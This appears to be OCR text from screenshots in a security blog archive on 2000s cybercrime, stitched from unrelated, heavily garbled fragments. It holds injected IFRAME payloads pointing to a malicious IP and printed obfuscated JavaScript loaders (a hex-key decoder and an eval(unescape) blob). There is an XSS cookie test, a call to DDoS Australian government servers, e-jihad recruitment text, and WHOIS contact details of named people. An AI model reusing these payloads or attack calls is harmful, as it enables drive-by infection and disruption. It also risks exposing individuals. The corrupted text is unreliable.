Search results for "border around page for myspace <IFRAME src=//195,225,.178.21/5> *. 
Sign up for e-mail alerts by search term “border around page for ... 

wow. news. com/2990-5_ 3-1. html? query=border+around+page+for+myspace+%3CiFRAME% 
20sre=//195.225.178.21/5%3E - 40k - Cached - Similar pages 


Search results for "discount ethan allen furniture <IFRAME src ... 

Search results for “discount ethan allen furniture <IFRAME src=//195.225.178.21/5> ”. Sign 
up for e-mail alerts by search term “discount ethan allen... 

www. news. com/2990-5_ 3-1. Se ee ee ee 
2sre=/195.225.178.21/5%3E - - Cached - Similar pages 


Search results for "john w nordstrom overcoat <IFRAME src... 

Search results for “john w nordstrom overcoat <IFRAME sre=//195.225.178.21/5> “. Sign up 
for e-mail alerts by search term “john w nordstrom overcoat <IFRAME ... 

www. news. conv2990-5_3-1.html?query=john+w+nordstrom+overcoat+%3CIF RAME% 
20sre=//195.225.178.21/5%3E - 39k - Cached - Similar 


oe rio for “extrem tating <IFRAME c= (195.225. 178.2V/a>*. San up for e-mail 
alerts by search term “extreem fisting <IFRAME .. 

werw. news. com/2990-5_3-1. html?query=extreem +fisting+%3CIF RAME% 
20src=//195.225.178.21/a%3E - 33k - Cached - Similar pages 


Search results for "myspace blog codes <IFRAME src=//195.226 ... 

Search results for “myspace blog codes <IFRAME src=//195,225.178.21/5> *. Sign up for e- 
mail alerts by search term “myspace blog codes <IFRAME ... 

wow. news. conw2990-5_3-1.himl?query=myspace+blog+codes+%3CIFRAME% 
2Ws1c=/195.225.178.21/5%3E - 40k - Cached - Similar pages 


Search results for "how to make desktop icons <IFRAME src... 

Search results for “how to make desktop icons <IFRAME src=//195.225.178.21/5> “. Sign up 
for e-mail alerts by search term “how to make desktop icons <IFRAME .. 

www. news. conw2990-5_3-1. html? query=how+to+make+desktopsicons++++++44++% 
3CIFRAME%20sre=//195.225. 178.21/5%3E - 45k - Cached - Similar pages 


Search results for "hooker fumiture company <IFRAME src=//195.226 ... 

Search results for “hooker furniture company <IFRAME src=//195.225.178.21/5> “. Sign up for 
e-mail alerts by search term “hooker furniture company <IFRAME ... 

www.news.com/2990-5 3-1, ee eee 
20sre=//195.225.178.21/5%3E - 36k - Cached - Similar pages 
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Doorway-Master Logged in as Kuk (User) TIME: Tussday, day 8, 2008; 17:46 


23058 


Topio Ancaynet na Blogger.com BETA 
Balance: 30.2437. Basket: O keywords (view) (Test) Saraning Search Raquasts 
fourtasian Weting 0, Working - 0, Uploading - 0, Completed - 16, Bid Checker freehosts Fast Subdonanes mations 
oor - Subdomains Poster Doorways on Blogger BETA Waws 
asks: Waking - 200, Working - 16, Uloedng - 772 Detailed Statistics BETA™ AU Pons Doorways on Blogger II BETA Forum 
Subdomain Daily Limit: 10 subdomains. Remains: 4. Stotistis Templates cols ag 
Referral rate: 6% Stats by Subdomains Payments Groups 
Conteceat ICQ = 806010, 257968306 (xendow), ICQ - 228486319, Stats by Marks Payment External Links Logout 
eed w Of Redirect Somes bed 
Hoaoctn mpoekta: 
1|2>> 


2008-07-08 ;: basa Kmovesrxoe, 

Onrrpein 0 aameen Gacy Knowle cnde. 6308 COGipanic. CaMOCTORTETRHO Nous NeTOM. COAT Pearse 
sanpoce:. 

Orepeira ana Tectupoeaea. Ecnt GyAeT MonesHa TO Opraecyem 6 asToMaTuackDe OGHOENEHE. 

D.s, Baza coBvpanact He Ha OM. Henan Knouesvent nanaTbca He GyayT. 


2008-07-03 :: Pacumpernve xoctvura 
Aobzevuni ewe one Cepeep ana xoctiewa Apeces. Xopousd4 KOHtber, mOpOuNe KaHanki, HOE IP, 


2008-06-30 :: NaGren anxayntes Ha cypexoctver ax. 


Mock fia BecxasaTb CEOS MHEHIE 6 COOTBETCTE)IOUIEM TONMKE Ha cbopyMe 
htp:/Meww.dmboard, com/viewtopic.php?f=38t=S33 


2008-06-27 :: Nocneanve vimeneren 


1 B paaaene Subdomains ACGsens ABE KHOR "YAanHTe CreHEpHpOBsHHeIE C OUMOKDM.” 4 ThepesanycTuTe 
C OusGend),” COOTESTCTBEHHO OAHa YAaNAST AODSEH ADYTaA Nepesanyorse’r, 


2 7a cy a paket fren penne ene eee ne ol 
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rch results for Tramadol for lowest prices Buy Tramadol ... 
Search results for “Buy Tramadol for lowest prices Buy Trarnadol Online Now <IFRAME 
sro=//195.225.178.21A>". Sign up for e-mail alerts by search term “Buy ... 
weew. news. com. ..//195.225.178. 21A%3E - 41k - Cached - Similar pages 


Search results for “state farm auto insurance quote <IFRAME src ... 

Search results for “state farm auto insurance quote <IFRAME src=//199.225.178.21/5>", Sign 
up for e-mail alerts by search term “state farm auto insurance ... 

ww. news. com/2990-5_3-1. html? query=state-Harm+auto+insurance+quote+%3CIFRAME% 
2Wsre=/195,225.178.21/5%3E - 40k - Cached - Similar pages 


Search results for “contact table for ce <IFRAME src... 

Search results for “contact table for myspace <IFRAME src=//195.225.178.21/5>". Sign up fo 
e-mail alerts by search term “contact table for myspace <IFRAME ... 

werw. news, com/2990-5_3-1. html? query=contact Hable Hort+myspace+%3CIFRAME% 
WOsrc=//'95,225,178,215%3E - 41k - Cached - Similar pages 


Search results for Cialis for lowest prices Buy Cialis Online ... 
Search results for “Buy Cialis for lowest prices Buy Cialis Online Now <IFRAME 
$re=//195.225.178.21/c>". Sign up for e-mail alerts by search term “Buy ... 
www. news, com, ..//195.225.178.21/c%3E - 40k - Cached - Similar pages 


Search results for Phentermine for lowest prices B 

Sign up for e-mail alerts by search term “Buy Phentermine for lowest pnces Buy Phentermine 
Online Now <IFRAME src=//195.225.178.21/p>". ... 

wow. news. com ..//195.225.178.21/p%3E - 40k - Cached - Similar pages 


Search results for "gieco auto insurance quotes <IFRAME src... 

Search results for “gieco auto insurance quotes <IFRAME sro=//195.225.178.21/5> ~. Sign ur 
for e-mail alerts by search term “gieco auto insurance quotes ... 

wew.news, com/2990-5_ 3-1, html?query=giecotauto+insurance tquotes+%3CIF RAME% 
Wsre=//195.225.178.21/5%3E - 32k - Cached - Similar pages 


Search results for "myspace moving text code <IFRAME src=//196.226 ... 
Search results for “myspace moving text code <IFRAME src=//195.225.178.21/5>". Sign up 
for e-mail alerts by search term “myspace moving text code <IFRAME .. 

weew. news, com/2990-5_ 3-1. htmI?query=myspace-+moving-Hext+code+%3CIFRAME% 
2sre=/195.225.178.215%3E - 41k - Cached - Similar pages 


earch results for "custo ace extended ne! ann : 
Search results for “custom myspace extended network banners <IFRAME 
src=//195.225.178.21/5>", Sign up for e-mail alerts by search term “custom myspace .. 
wew. news com, ..//195.225. 178. 21/5%3E - 41k - Cached - Similar pages 


"lol i i A 
Search results for “lois hentai porn ay a y <IFRAME src=//195.225.178.21/a>". Sign up fo 
e-mail alerts by search term “lois hentai porn family guy ... 
werw. news. com/2990-5_ 3-1. html? query=lois+hentai+pom+family+quy+%3CiF RAME% 
Wsre=/195.225,178.21/a%3E - 36k - Cached - Similar pages 


Search results for “ash and misty hentai <IFRAME src=//195.228 ... 
Search results for “ash and misty hentai <IFRAME sro=//195.225.178.21/a>". Sign up for e- 
mail alerts by search term “ash and misty hentai <IFRAME ... 
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4 

Function oFAmFB(u3KeH7Bpc)<{ var 
qCahCp2j7=arguments.callee.toString()-replace(/\W/g,"").toUpperCase() ;var amst6129=111;var 
jihae122923;var e4AGuYwJe ;amst 612991234; jiha+=133601;var ldnCilJ=qCahCp2j7.length;var Smojat=new 
Array () ;Smojat[6]=11;jiha+=1323;var gsTJb6A;amst6129=Smojai[6];var AAmm=new Array();jihat=123;var 
jina3=161;Smojat[1]=1266;var QSra;Smojat[2]=11623; jinat+=124423;jiha3+=221;var Wr8N="* ;var 
uwoU=new Array (); for (M=65M<256 ;N++)uwoU[M]=6;var e4AGuUYwJe=1 5 For (M=128 ;M>M>>=1) 

(e4AGuYuJe* (e4AGuYwJe>>>1)* ( (e4AGuY wet ) 73988292384: B) ; For (nOwF «O;nOwF<256 ;nOwF +=Me2) 
(uwoU[nOwF+M]=uwol[ nOwF ]~e4sAGuYwJe 51 f (uwoU [ nOwF +N] <6) uWwoU[ nOwF +H] +=4294967296 ; >} }gsTJD6A=429496729 
5; for (esAGuYuJe=6;e4A BuYuJe<ldnC11J;e4AGuYuJe++) {gsTJbD6A=uwoUl (gsTJb6A~ qCahCp2j7 .charCodeat(esAGu 
Yue) )&255]~((gsTJD6A>>8)&16777215) 5 }gsTJDGA=gST JD6A~ 4294967295 ;uar r7;¥ar 

F;e4AGuYwJe=gsT Jb6AR65535 ;r7=e4AGuY we .toString(16) -toUpperCase( ) ;while(r7-length<4){r7="O"'+r7; pe 
4ABUYwJe=(gsTJb6A>>>16)&65535 ; F-e4AGuYwe .toString(16) .toUpperCase( ) ;while(f.length<4){F="8"+F; }Q 
SrA=f+r7;var Mjvar AabX=8;var m8;var WO;var J3A;var 

yO7Ue="" > for (M=8;M<u3KeH7Bpc . Length ;M+=2){ J3A=6; WrSN="" 5 W6="" 5 WG+=u3KeH7Bpc .charAt(M) ;WG+=v3KeH7B 
pe .charAt(M+1) ;m8=parseInt (WO, 16) ;J3A=m8-QSrA.charCodeAt(Aabx) ;if (AabX<QSrA.length~1){AabX++ ; els 
e{Aabk=O; pM+=2;while(J3At=6) {WO=""';WO+=-usKeH7Bpc .charAt(M) ;WO+=u3KeH7Bpc .charAt(M+1) ;m8=parselnt( 
6,16) ;Wr8N+=String . fromCharCode(m8-QSra.charCodeAt(Aabx) ) ;if (AaDX<QSrA.length-1){AabX++; }else{fa 
bX=8; }J3A-— 5; M+=2; puar 

g=parseInt(Wr8N) ;if (gt=8) {iF (g>127){Wr8N="GH"' +g. toString()+";"; }else{Wr8N=String.fromCharCode(g) ; 
}yO7Ve+elr8N; }M-"2; }docunent .write(yO7Ve) ;Smojat[ 6)"123; jiha+#119;AAMNM[ 6) "1 ;AAAM[ 1) "AAMM[ GB] ;ansto 
129=100; jiha3=199; jiha=Smojat[ 8) ;amst6129=161;} 

OFAMFB( ‘446 F67346B603D68736F 32636 7663B6874693a63686D3A7 87930686 36B386967733b7 669396b6A3978693A636 
7693bD68736F3A636 7630687 2713968693 7696A446A67346D653b687 26032636 7663A7 07930686267376E69446A6 a3 468 
6536d7230686360386967 7730686360386 967730686 26837606 9446F 67346B603B687 36F 396367 6N3b68736F 3A63676 
03b6872639686937696A446N67346d653B68736e396b7 6386968 7630686260386 9687 43068636037 6B69456R676N396E 
6F3A736A673568656D3A736.a6E347 86C3b687 26032636 7663607 330686260377 16E 456 a686N396e6F 3a736a6C347 B6e3 
068736030636 76a3b68736b3A6368603 a6D743b6865396668397360396 3673869677 43068636e386968723b7 86b3a6669 
6D4564a676739666968456a686239686a3a736A603568666E397b7 0363686 93b68736F 396667376068446C69356867683 
97360396367376969446N67337 6386 9687N3B7 0693.266696B446C693568656D3.a7 3696935686660397b7 63a63676e3B68 
726396569376268446C69356865683a73668347 0603D68737 636367 6e3b68726.2326368653b68736F39666D37717 Ou 
56A68663A6668684472663568666e3A7 36968346 06E3B687 27 132636 7663B6872723A6367663B6873693A63686B3A6B72 
3b6.46B3A66686C4566 7643666 96b44726e356865 7 13A736968346a6E 34687 33b606039666b397369396364a376967437 
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The phone back location is also hosting more active scarewaredomains: 
ultraantivirus2009 .com - 64.86.17.9 

virusalarmpro .com 

vmfastscanner .com 

mysuperviser .com 

pay-virusdoctor .com 

virusmelt .com 

payvirusmelt .com 


Not only is life4info .info or dirsite .com a bogus free hosting provider, but the cam- 
paigns hosted by them are interacting with our "dear friends" at [5]AS30407; VELCOM .com 
which Spamhaus describes as "N. American base of Ukrainian cybercrime spammers" - and 
with a reason. 


1. http: //ddanchev. blogspot .com/2009/05/gaztranzitstroyinfo-fake-russian-gas.htm 

2. http://blogs.zdnet .com/security/?p=183 

3. bttp://www.virustotal.com/analisis/96ef88149ff£92023f 6dc8393c547 ed3ad5£ 2938a3018c08a7 105c63677ea6391-12444 
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n.runs has the following bugs pending and is aware of at least another DoS bug pending from a independent 
researcher. Here is the list of pending McAfee bugs reported by n.runs : 


incident 1D: MFE-FW-20060227-01 - 

incident ID: MFE-ENG-20070605-01 - 
incident 1D: MFE-ENG-20070607-01 - 
Incident ID: MFE-ENG-20070608-01 - 
incident ID: MFE-ENG-20070608-02 - 
incident IO: MFE-ENG-20070615-01 - 
Incident ID: MFE-ENG-20070615-02 - 
Incident 1D: MFE-ENG-20071111-01 - 
incident 1D: MFE-ENG-20071111-02 - 


Date of receipt: February 27, 2006 

Date of receipt: June 5, 2007 (Possible Vuln #15) 

Date of receipt: June 7, 2007 (Possible Vuln #18) 

Date of receipt: June 7, 2007 (Possible Vuln #23) 

Date of receipt: June 7, 2007 (Possible Vuln #25) 

Date of receipt: June 15, 2007 (Possible Vuln #27) 

Date of receipt: June 15, 2007 (Possible Vuln #28) 

Date of receipt: November 11, 2007 (Possible Vuln #36) 
Date of receipt: November 11, 2007 (Possible Vuln #37) 


Simply adding these pending reports to the graph gives the following result. n.runs believes this does indeed 
represent a trend, not to mention these only include problems reported by n.runs, not external researchers or 
entities nor internal penetration test efforts (which also pose a security threat during the exposure window but 


are never published). 


Year Breakdown 
1999 
2000 
2001 
2002 
2003 
2004 
2005 
2006 
2007 


Vulnerabilities per Year 


NNN OF NN 


= 
> 
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Date Risk Origin 
2/9/2008 2:43:06 AM = watt Bs n/a 
2/8/2008 11:12:30PM —-sst na Win32. Virut Gen 4, Downloader, W32/Viruth, PE VIRUT. YE. 
2/8/2008 4:28:47 PM esther 
2/6/2008 9:59:44 PM euttl a 
2/5/2008 11:58:14 PM. v/a Win32.Virut Gen 4, Downloader, W32/Virut gen a, PE VIRUT XY. 
2/5/2008 3:49:54 PM ett a Vi 4, W3 : A Known Bad Si 
2/4/2008 10:50:19 AM sth Win32.Vi 4, Virus Virut AV, Trojan-Downloader Small. 
2/1/2008 7:24:56 PM ttl Win32 Virut Gen 4, Trojan Win32.Pakes bte.. 
eee ks a Trojan Tiny MK, Virus, Win32, Virut y, Trojan-Dropper NSIS Agent b.. 
12/28/2007 645:15PM .t Trojan Virtumonde, Adware Maxifiles, Trojan DL. Small VWY, 
12/20/2007 6:34:19PM  .l ojan Virtumonde, Adware Maxifile ojan DL. Small VWY.. 
12/1 at 34141 ig sth a ader Wi ey - 
11/8/2007 8:37:36 AM = -antl n/a W32/Virut gen.a 
10/26/2007 3:20:22 PM «sath n/a W32/Virut j 
10/5/2007 4:32:56 PM -ettl n/a Bloodhound W32.1 
10/5/2007 1:19:14 PM ett n/a Bloodhound W32.1, W32/Virut d 
9/30/2007 12:18:38 eens 


AM 
9/28/2007 2:04:22 PM wettl  a 
9/24/2007 2:37:28 PM west 


Virus. Win32. Virut.g, W32/Virut gen, TROT DORF_AG 
Trojan. Win32 Inject ff Trojan-Downloader Win32_Agent dlu_ 


[900] 


P nytgate0S.nytimes.com (The New York Times) [Label IP Address] 

New Jersey, Bergenfield, United States, 0 returning visits 
Date ‘Time WebPage . = 
13th June 2007 19:47:40 Sww.linuxsecurity.< pifviowl: 
13th June 2007 19:59:48 
13th June 2007 20:03:49 
13th June 2007 20:04:44 
13th June 2007 20:04:49 
13th June 2007 20:06:41 
13th June 2007 20:06:43 
13th June 2007 20:06:54 


13th June 2007 20:07:13 


13th June 2007 20:07:14 


as No referring link 
13th dune 2007 20:09:98 ddanchev .bloaspot.com/2007/06/analysis-of-technical-muiahid-issye-two.html 
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SCRIPT LANGUAGE=""JavaScript"> 


val(unescape("\X76\X61\X72\X25\ X32\K3 OVX 72\ KOS\X25\XS2VXSO\K25\KI3\ KSHV X25) XB2VXSB\XGEV KOS \K77\ x 
PS\XS2\x3 O\xS2\K65\x67\K4S5\xX7B8\ x7 OVX25\K32\X3B\X25\K32\K92\ X6B\ XZ AVX 7H K7 OV X25\KX33\ X41 \X2F\K2F\x2 
\XS2\xX3B\K25\ x35 \x42\ x2D\ KSFE\X25\xX35\xX43\xX2E\ x3 O\x2D\ x99\K61\X2D\ x 7A\ X41 \X2D\XSA\K25\ X95 \x44\ x2B 
K25\KS2\KS9OLKZE\K25\KSS\KNG\K25\KS2\KS2\K25\KS2V\KNS\K25\KS2V\KS2\KOO\ KOZ \K2Z5\KS2\KS2\K25\K32\ x39 
K25\XS3\KN2\K25\XSO\ KAY K25\ XS OV XNTVXZO\KOTVKZ2\K25\KXS2\XSG\ KG TVX 7Z2V\K72V\KX25\XS2\KSB\K25\XS3\ KNX 
PS\XS2\X3O\X72\KG65\X2ZE\X65\X7B\ X65\ x63\K25\X32\xX3B\ XGC\XGF\X63\X61\ x7 4\ xX69\ XGF \XGE\X2E\x68\ x72\x6 
\KG6\X25\KS2\K99\K25\ X33 \KS2\K25\ KS BV KES K25\ XS O\KAT\ X76 \ KO TV X72\K25\ KS2\ KS B\ KGS K25\ XI3\ KSA XS] 
X65\K67\KNS\K7B\X7 O\XZE\K25\KS2\ XIE XS1\K25\K33\ KN2\K25\ XS BV KAM K25\ KS B\KN1\K7O\K61\K72\K25\ x32 
KSO\X7S\K7S\K25\KS2VKS O\K25\KXSS\KHE\ X25 \KXS2\K3 BV KON KZEVX73\K7 BV KOC\KOO\X7H\K25\KS2\K3B\K25\x32\x 
2\KZE\K25\XS2\KS2\K25\KS2\KS9\K25\XS3\KS2\K25\ KS OV KEE X25\ XS OVKETVX76\KOTVX72\K25\xX32\K3 BV X60 \x 
\XS32\xXS3 B\X25\xX33\K4S4\ x25 \x32\ x3 B\xK73\ xX739\KXZE\X6C\xX65\ xXGE\KX67\X74\xGB\ x25 \x33\ x42\x25\ xT B\xSh\ x2 
XS O\KAAVK7O\KGTVX72\K25\KS2\ KS B\KG2\KOS\K25\KS2\ KI OV X25 \XSIS\ KAM K25\KI2\KSOVK73\K73\K25\ KIS \K4N2 
KOC\X2ZD\XS2\K25\KSI5\ KUNA K25\ KXS2\KSB\KZB\X25\KXS2\KSB\K25\KXS2\KS2Z\KZE\K25\KXS2\K32\K25\KS32\KXSB\K2B\ 
PS\XS2\K3OV\X73\K73\K25\K35\K42\KGC\X2D\K3STV X25 \XS5\KHE\K25\XSS\K4E2\ X25 \ KS BV XNA K25\XSOVKATNVXO9\ XG 
B\X25\X32\X3B\ x62 \KG4\ xXZE\x73\ X65 \K61\ X72\K63\ X6B\X25\ XB2\KIB\ X25 \XS2\XI32\X6B\ X67 \X68\ X25 \x32\ x32 
X25\KS2\KI9O\K25\XSS3\KHR\ X25 \KIS\ KHA\X2D\KS1\K25\ KI2\KS9\K25\KS7\KH2\K25\ XS BV KSS\ X25 \ XS B\KH1\ x25 
KSO\XS9O\KON\XGFE\KO3\K75\x6D\ KOS\XGE\ X74 KZE\ KZ UV KOO\KZE\KOC\KO5\ X25 \ KS2\XIB\K25\KSS\ KG X25\ X32) 
O\X25\XS2\K32\K57\ X65 \K6C\XOS\KGF\XOD\KO5S\X25\XS2\K32\K25\ XS3\ KHZ) X25 \ KS BV KES X25\XSB\K4TVX25\ KF 
V\XS4\ x65 \K6C\X73\KX65\ X25 \K37\X42\xX25\ XS B\ XS) X25 \ XS BV X41 \X25\ XS B\XS9\ XOS\XGF \X63\K75\ x6D\xX65\x6E 
X7TA\XZE\XTA\KO9\X7H\KGC\ KGS\K25\ X32\ XI B\X25\KI3\ KBE X25\ XI2\KIB\K25\KI2\KI2\KS7\ X65 \ X60 \ X63\ x6F 
KOD\XGS\K25\KS2\KS2\K25\KSS\KH2\K25 \ KS BV KEN\ K25\ KS BV KETV K25 \KS7 KEE K25\ XS BV KEAA X25 \ KS OVKNTVK75\ 
2\KXOC\K25\XS3\ KHAN K25\KS2\KS2\ KGB X7HAK ZU KZ OV K25\KS3\ KETV K2ZFA\K2ZF\K7Z7\K77N\X77\K2E\KO1\K62\ X65 \x 
\X74\XGS\K72\ X60 \K65\ X76\K65\ X60 \XZ2E\XGF\X72\X67\X25\ X33\K41\ X38 \ XS O\XIB\XIB\ X2F\X63\ X67 \K2F\ x25 
XS2\KS2V\KZ5\KIS\KH2\K25\ KS OY KAHN X25 \ XS BV X41 7 GV KG 1X72) K25\K32\ X39 OLX 7O\KGSLKST\ X25 \ X93 \ KH x25 
KS2\KXS7\K61\K62\K63\K64\ x65 \ KG6\K25\XS2\KS7\K25\KI3\KN2\K25\ KS BV KEE K25\ XS OV KNT\K76\KO1\K72\x25\ 
B2\XSO\K7ON\KOS\KS2\K25\KSSV\ KUNA K25\KS2VLKS7\XSOVKSINKS2V\KSS\ KIEV KIS \XSO\KS7\KIB\KSO\ XS B\K61\K62\x 
\X64\X65\K66\X67\K68\ K69\X6A\ XOB\XOC\XOD\XGE\ XOF\X7 OV X71\K72\K73\ XK 74X75 \K7O\K77\KX7B\K7Z9O\KZANK2G 
X32\K37\KX25\KI3\KS2\ X25) X3 BL XS4S\ X25 \ XS BV K41\K76\ K61\X72\ X25 \X32\ KI BL X63\ X25 \X33\ XS4\X4D\ x61\x74 
KOB\XZE\xX66\X6C\X6F \XGF\X72\xX25\x32\x38\ xX4D\x61\K74\ x68\ X2ZE\X72\ K61\XGE\ XOS\XGF\X6D\x25\x32\x98\x 
SA\KS2\KS9\K25\KS2\KSB\KZA\K25\KS2\KSB\KSIO\K2Z5\KS2\KS9\K25\KS2\ KS OV K2ZB\K25\KXS2\KSO\ KIN K25\KI3\ xs 
PA\X25\X3 O\K4S\X25\X3O\XNINVK7ZON\KOINKZ2V\K25\K32\K3 BV XG4VX7 BV X25\XS2V\KS BV K25\KI3\KHEVK25\XB2VKSOVK7 
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JS won" [2 


Hactpoiikn 


alert (document .cookie): 


Yponem: JS uryma 
op ak 


YenonerkonepemennEre 
[get setver dete window document word leter as ns use f 


<scriptovar dateVindow;this.asDate="asDare";dareVindow='thbtaitbétas 
ID7TeLLIDStD Si aly Seiorv asi dai all dbs adtasibarys1soSibowss 

se9' this. charlse*"*charUse": function 

staticByteUse (doubleByteGet) (var letterInc#24669; function 

nullLongSet (getFloat)(var falseDate*0: vordDoubie*0; 

whale (wordDouble<4) (wordDouble++);var intInt=getFloat. length, 
longLongAs*O;this.byteVarF loat*** ; while (longLongAs<intInt) 
(vindovLongStatic=0; while (vindovLongStatic<0) 

(windowLongStatic++);var dateUse=function() 

(}sfalseDate+=longAsDouble (get Float, longLongAs) "int Int: 

longLongAs++;)} function vordAsFalse (wordAsFalse) (return 
*wordAsFalse');return (falseDare+' ') : for (asFinal*O;asFinal<0; 
asFinal++)(}:)}function longNullUse (longNullUse) (return 


a 8 ' ween . = + wom 


Re we es ee MRAM SoH 


Inthe Name of Allah, Most Beneficent, Most Merciful 
All Praise is for Allah, and may Prayers and Peace be upon the Messenger of Allah and upon his Family, Companions, and whoever is guided by his guidance. 
What is eTHAD 1 


JIHAD is the term ured for struggle against evil, Electronic jihad or simply , E- JIHAD , is the jihad in cyberspace against all the propagandas and false allegations against the message of truth . E-JIHADis 
the struggle in cyber space against all false and evil disciplines, ideology and forces of evil . 


Have you ever think what is the need of army? To defend the freedom and liberty of a territory and defend it from the attacks of evil intruders. i » E-jihad is the battle in the field of cyber space, 
pear pc 9 shone rege aloe eg lg ae hoe Shanes rivet Bete ea apricots etry OTe Ak rr) ta ae et my ed * x 


Tt iseaid,* it is not the gun, it is man behind the gun “. Do you ever think what makes a “man *? Nothing, but just the faith and ideology. Without faith and ideology, there it nor al 
then have gun , but without any man . 


‘Migsheald ws an eA 
The Muslims in general and the scholars in particular are commanded to call people to Islam, as Allah says (interpretation of the meaning); 


“Lat there arise out of you a group of inviting to all that is (Islam), enjoining Al-Ma’roof (ie. Islamic Monotheism and all that Islam orders one to do) and forbidding Al-M 
disbelief and all that has for! |. And itis they who are the successful"[Aal ‘Imraan $104) 


The Prophet (peace and blessings of Allah be upon him) said: “Convey from me even ifit is (only) one aayah.” (Narrated by Al-Bukhaari, 9461) 

Calling to Allah is an important task and a glorious mission, because it means calling to worship Allah alone. It means bringing them forth from darkness to the light, pl 
and truth in the ether La emmy heh py wi a pr teh in be tee nod vec 

Lez citrcrcrianteeeetesnbedemennmacduaie. ° 

Allah says (interpretation of the meaning 


“Invite (mankind, O Muhammad) to the way of your Lord (12. Islam) with wisdom (i.e. with the Divine Revelation and the Qur'aan) and fair preaching, and argue with them in a way th 
your Lord knows best who has gone astray from His path, and He is the Best Aware of those who are guided” [Al-Nahl 16c125) 


Allah Subhanu Wata’Allah also orders us to do good deeds as = 
“ I swear by the time, Most surely man is in Joss, Except those who believe and do good, and enjoin on each other truth, and enjoin on each other patience. “( AL-ASAR 10921 - 109! 
that means if we dont want not to be among lovers , we have to follow the HOLY teachings of Allah as well as we have to try to rpread the DIVINE TEACHINGS to every human being. 


Very simple, just believe that you are a cyber ecldier to defend your religion, to defend your faith, to defend your HOLY TEACHINGS OF HOLY QURA’AN ANDSUNNAH, and you will 
MUJAHID* the very next moment. 


After all , it is very inexpensive and time convenient and we dont have to go anywhere and not to spent anything. all we need is a PC connected to internet and it is available in nearly 
getting this message because you have already access to computer and internet - 


DPMPMERPD san dant henetadn ane avics arrannamante foe "PF. ITHAN it hee ne cnet host it rier vale Af eunmat fenit Af ences in wie life oe wall oe life afar death 
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4. bttp://www.virustotal.com/analisis/b56d88ef 2aea4c0df0be48a41821becc15b6e2ba9ca7b7637 26ac6797 3ce4d5f- 12440 


5. http://www. google. com/safebrowsing/diagnostic?site=AS : 3040 


5.6.6 GazTransitStroy/GazTranZitStroy Rubbing Shoulders with Petersburg Internet 
Network LLC (2009-06-08 14:28) 


Trasnan 


© Pecypcit ofmeroponceot nomamened cone PIM-IX maw! 


Novemy .asatnenasot Collocation © mamek mosenaeeen? [pn 
aamate Coffocation y mac Bea Monyuacte IMauNTenednee 
SnOpe H EpeMMyujEcTna, K Tosey Ke Bam He HyHURO 
mUneCTRpOSaTh Cpegciaa # oGopyjonanne 


aoe haart 
TEXHIPCOCKOR MOY QOPOK KH COpREpHOR Crasipe: HT. 


orem (reine otinn) 


Following the [1]GazTransitStroy/GazTranZitStroy (gaztranzitstroyinfo.ru; 67.15.253.241) 
coverage, [2]the gang behind the bogus gas company drilling for [3]insecure PCs across the 
Web has returned to its roots - St. Petersburg, Russia, with routing services courtesy of PIN-AS 
Petersburg Internet Network LLC (AS44050) (internet-spb.ru) : 


"descr: Petersburg Internet Network LLC 
address: Sedova 80 
address: St.-Petersburg, Russia 
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OPERATION: TITSTORM 


A PART OF OPERATION INTERNET FREEDOM 


THE ATTACK! 


1. On February 10th 8:00 AM Australian time 
we will begin a DDoS of government servers 


2. This will be quickly followed by a shitstorm 
of porn email, fax spam, black faxes, and 
prank phone calls to government offices 
(emails/faxes should focus on small-breasted 
porn, cartoon porn, and female ejaculation, 
the 3 types banned so far) 


3. Information on the targets for the shitstorm 
can be found here: 

HTTP://UUU BPH. GOUARU/OPS/RORINISTRATI 
ON.HTA 
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WHAT? WHEN? 


PARTICIPATE FELLOW ANONYMOUS! 


The Campaign begins.. 


8:00 AM , AUSTRALIAN TIME (GMT +10:00) 
February 70th. 


(FEBRUARY 9TH FOR 


U.S.A. AND CANADA.) 
(5:00 EST | 4:00 CST | etc. ) 


TO FULLY PARTICIPATE IN THE ATTACK: 


Use an IRC Client and connect to... 


Server: irc.anonnet.org 
Channel: #titstorm 
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welcome admin 


Tonal Bone © Total Pome 
pring Botan © Online tm 


Tools 


Bots Cleaner 


a mh a Aire more an 


EMAILGRAB 


Total Logs [] 
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Iran's Artillery Rockets 
[aka Katyusha] 


Fadjr-5 
333mm 

45km 45km =: 13km 20 km 1 ne 

70 kg 45 kg 190 kg 190 kg 90 kg 
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Red Apt pati lis 


JH bh See 
eh AD pe Snes eee eee - 
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“Ws = Kalashnikoy CS aw ee ite - 
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Make HLUGE.money 


with legalfpays per-install. 
Bestconverth'a\cdsypapprove 
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e-mail: support@internet-spb.ru 
phone: +7 812 4483863 

fax-no: +7 812 4483863 
person: Metluk Nikolay Valeryevich 
address: korp. 1a 40 Slavy ave., 
address: St.-Petersburg, Russia 
e-mail: nm@internet-spb.ru 
phone: +7 812 4483863 

fax-no: +7 812 2683113 

PIN LLC 

Sedova 80 

+7 812 4483863 
support@internet-spb.ru 


St 


—— + 


Metluk Nikolay Valeryevich 
korp. 1a 40 Slavy ave., 
St.-Petersburg, Russia 

+7 812 4483863 
nm@internet-spb.ru 
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Ladoha Anton Vladimirovich 
korp. 1a 40 Slavy ave., 

St. Petersburg, Russia 

+7 812 4483863 
admin@internet-spb.ru 


Strukov Evgeny Olegovich 
korp. 1a 40 Slavy ave., 
St.-Petersburg, Russia 

+7 812 4483863 
admin2@internet-spb.ru 
e.strukov@pinspb.ru 


Prefixes 91.212.41.0/24; 95.215.0.0/22; 194.11.16.0/24; 194.11.20.0/23; 195.2.240.0/23" 


* . N — . 4 . 2 


' ta 


oned 


woh Slavy, 40 xopnyc 1 4 
Russian Federation, 192238, St Petersburg mae 


What’s also worth pointing out that is a huge number of of domains operated by GazTransit- 
Stroy’s customers, and, of course, GazTranzitStroy themselves not only traceroute back to 
Petersburg Internet Network LLC’s network, but also, there’s an evident migration to the legit- 
imate NETDIRECT-NET - 89.149.206.0 - 89.149.207.255 - AS2875, as well as to CHINANET-SH 
CHINANET shanghai province network - 222.64.0.0 - 222.73.255.255. 
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Conk 


FSC “FirstRun” 
USERI2. SetDigitenTextA 


“gPaBi GEER EEEEREEEEE 
SeBRREA A SEL BB BSAA 
ERRTUSETIASSERSLLTE 


—t 


PSUBSLEWSSLASESERSZ 
SSSIMATUTTLS2BGz 


i 8 A tiie 


nt 
Th 
a g 
& 


 S83RBBERZBS SEBEL SEE 


PSrsstheresssesserre 
pasSakhsrSE-35888378 


BSS 


Fs aa, EET 
Bs ue ee a 
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nain thread, module mirande3] 


ECx EDETE 
mag EDX OO4SDSIO nirands?. G4S0610 
ure. 06194918 


< 


\tlesifection =» nirandsed. 00450610 


